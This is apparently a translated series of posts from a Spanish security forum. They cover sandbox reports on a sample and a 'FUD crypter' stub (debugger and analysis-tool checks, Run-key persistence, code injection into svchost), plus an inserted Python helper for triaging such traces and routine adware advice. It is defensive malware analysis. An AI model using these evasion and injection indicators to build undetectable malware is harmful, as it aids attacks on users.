Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

Continues...
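As an added example (not part of the original post, nor code from Buster Sandbox Analyzer), a small Python triage helper for this kind of API trace: it parses the `Function(args) [caller]` lines, lists which process names the sample probes through OpenProcess/lstrcmpi and which of those are analysis tools, and decodes the Run-key REG_BINARY value from the BSA report back into its UTF-16LE path. The sample trace lines are a constructed subset of the log above with a shortened caller path, and `ANALYSIS_TOOLS` is my own list built from the names seen in the trace.

```python
"""Added example (not from the original post): triage helper for the
BSA/Sandboxie-style API trace quoted in the thread.  Each line has the shape
Function(arguments) [calling process]; we pull out the process names the
sample probes and decode the REG_BINARY Run-key value from the BSA report."""
import re
from collections import Counter

# Analysis-tool names the trace probes; lower-cased because lstrcmpi is case-insensitive.
ANALYSIS_TOOLS = {
    "wireshark.exe", "dumpcap.exe", "procexp.exe", "idag.exe", "sbiectrl.exe",
    "sbiesvc.exe", "vboxtray.exe", "vboxservice.exe", "bsa.exe", "sniff_hit.exe",
    "evo_dbg.exe", "pe explorer (portable).exe",
}
# Greedy ".*" + "\)\s+\[" keeps a nested ")" in arguments such as "PE Explorer (portable).exe".
TRACE_RE = re.compile(r"^(?P<func>\w+)\((?P<args>.*)\)\s+\[(?P<proc>[^\]]+)\]\s*$")

# Constructed subset of the trace above; the caller path is shortened for readability.
SAMPLE_TRACE = r"""
IsDebuggerPresent() [c:\sandbox\jsob.exe]
OpenProcess(wireshark.exe) [c:\sandbox\jsob.exe]
OpenProcess(notepad.exe) [c:\sandbox\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\sandbox\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\sandbox\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\sandbox\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\sandbox\jsob.exe]
"""
# Hex REG_BINARY value of HKCU\...\Run\jsob.exe exactly as printed in the BSA report.
RUN_VALUE_HEX = ("43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00"
                 "7200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C00"
                 "43006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000")


def parse_trace(lines):
    """Yield (function, [arguments], calling process) for each well-formed trace line."""
    for line in lines:
        m = TRACE_RE.match(line.strip())
        if not m:
            continue  # blank lines, report headers, etc.
        raw = m.group("args")
        yield m.group("func"), [a.strip() for a in raw.split(",")] if raw else [], m.group("proc")


def probed_processes(events):
    """Count probed names: OpenProcess targets plus the left operand of lstrcmpi."""
    names = Counter()
    for func, args, _ in events:
        if func == "OpenProcess" and args:
            names[args[0].lower()] += 1
        elif func == "lstrcmpi" and len(args) == 2:
            names[args[0].lower()] += 1  # each enumerated process is compared against explorer.exe
    return names


def decode_reg_binary_utf16(hexstr):
    """Decode a REG_BINARY blob holding a NUL-terminated UTF-16LE string."""
    return bytes.fromhex(hexstr).decode("utf-16-le").rstrip("\x00")


def triage(trace_text):
    """Summarise anti-analysis checks and file activity found in one trace."""
    events = list(parse_trace(trace_text.splitlines()))
    names = probed_processes(events)
    return {
        "checks_debugger": any(f == "IsDebuggerPresent" for f, _, _ in events),
        "probed": names,
        "analysis_tools_probed": sorted(n for n in names if n in ANALYSIS_TOOLS),
        "files_created": [a[0] for f, a, _ in events if f == "CreateFile" and a],
    }
```

Run `triage(SAMPLE_TRACE)` and `decode_reg_binary_utf16(RUN_VALUE_HEX)` to get the probed-tool list and the persistence path; pointing the parser at the full trace above works the same way.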
883  Computer Security / Security / Re: Help with low-level formatting on: 14 February 2013, 15:56 pm
Which program did you use, HDD Low Level Format Tool?
You say it recognizes the disk, but when you go to format it you get the blue screen straight away.
When it sends you to the blue screen, what type of error does it show?
884  Computer Security / Malware Analysis and Design / Re: Nap trojan on: 14 February 2013, 15:19 pm
Very good analysis  ;-)
I liked the use of Rootkit Unhooker; I think it's an excellent tool.

Regards.
885  Computer Security / Security / Re: Comradex Crypter Fud By dr.fan0 on: 10 February 2013, 11:48 am
So what do we do then, delete the thread?

This is what I got with BSA:
Quote
[ General information ]
   * File name: c:\documents and settings\r32\mis documentos\descargas\comradex crypter\stub_unc.exe

[ Changes to filesystem ]
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Modifies value "SavedLegacySettings=46000000CC0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000CB0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"

[ Network services ]
   * Looks for an Internet connection.

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates process "C:\WINDOWS\system32\svchost.exe,(null),(null)".
   * Injects code into process "c:\windows\system32\svchost.exe".
   * Enumerates running processes.
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Opens a service named "RASMAN".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "Sens".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Creates process "(null),C:\WINDOWS\system32\drwtsn32 -p 1796 -e 340 -g,(null)".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000070".
   * Injects code into process "c:\documents and settings\r32\mis documentos\descargas\comradex crypter\stub_unc.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
886  Computer Security / Security / Re: Comradex Crypter Fud By dr.fan0 on: 10 February 2013, 01:57 am
Anubis didn't detect any connections, but it did detect the use of the library:
IDA:

PE Explorer:

It creates the svchost process:

I'm looking for some timer or similar; something doesn't add up. Anyway, I'd rather learn to program one myself than use that one.

Edit: On Indetectables they haven't said anything; they even have their own forum (comradex.co), so I'm going to register and see what I find.

Regards.
887  Computer Security / Security / Re: What is the safest way to delete a file from the disk? on: 9 February 2013, 13:22 pm
There are several programs such as Eraser, Disk Wipe, Hardwipe, Trituradora.
Note that some tools such as CCleaner allow "secure" file deletion through several methods:
Simple overwrite (1 pass) ... used by default.
Advanced overwrite (3 passes)
Complex overwrite (7 passes)
Very complex overwrite (35 passes)

The more passes it does, the harder recovery will be, although on large files the very complex overwrite takes a long time.

Regards.

888  Computer Security / Security / Re: [HELP] Is this normal? [URGENT] on: 9 February 2013, 13:13 pm
The folder may be related to Windows Update; those represent the service pack updates and patches.
Did you run into any problem with Windows Update?

Regarding the entry that runs at system startup, the Windows Sidebar is the side bar to which you can add the clock, calendar, RAM and CPU usage, etc.
If you don't use it, you can untick the entry and it will no longer run.

Regards.
889  Computer Security / Security / Re: Lance Armstrong and Discovery ads on my machine on: 6 February 2013, 15:20 pm
Have you tried installing a plugin to block ads, such as Adblock Plus:
http://es.wikipedia.org/wiki/Adblock_Plus

I think that would solve it for you; here's the link for Chrome:

https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb?hl=es

Regards.
890  Computer Security / Security / Re: I got a virus and I don't know how on: 6 February 2013, 14:55 pm
I don't see any trojan; if you use LogMeIn legitimately, nothing looks odd.
Your Internet Explorer home page has been modified; if it also happens in Chrome, go into the settings and change the search engine:

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxtp://google.icq.com/search/search_frame.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxtp://websearch.just-browse.info/

Regards.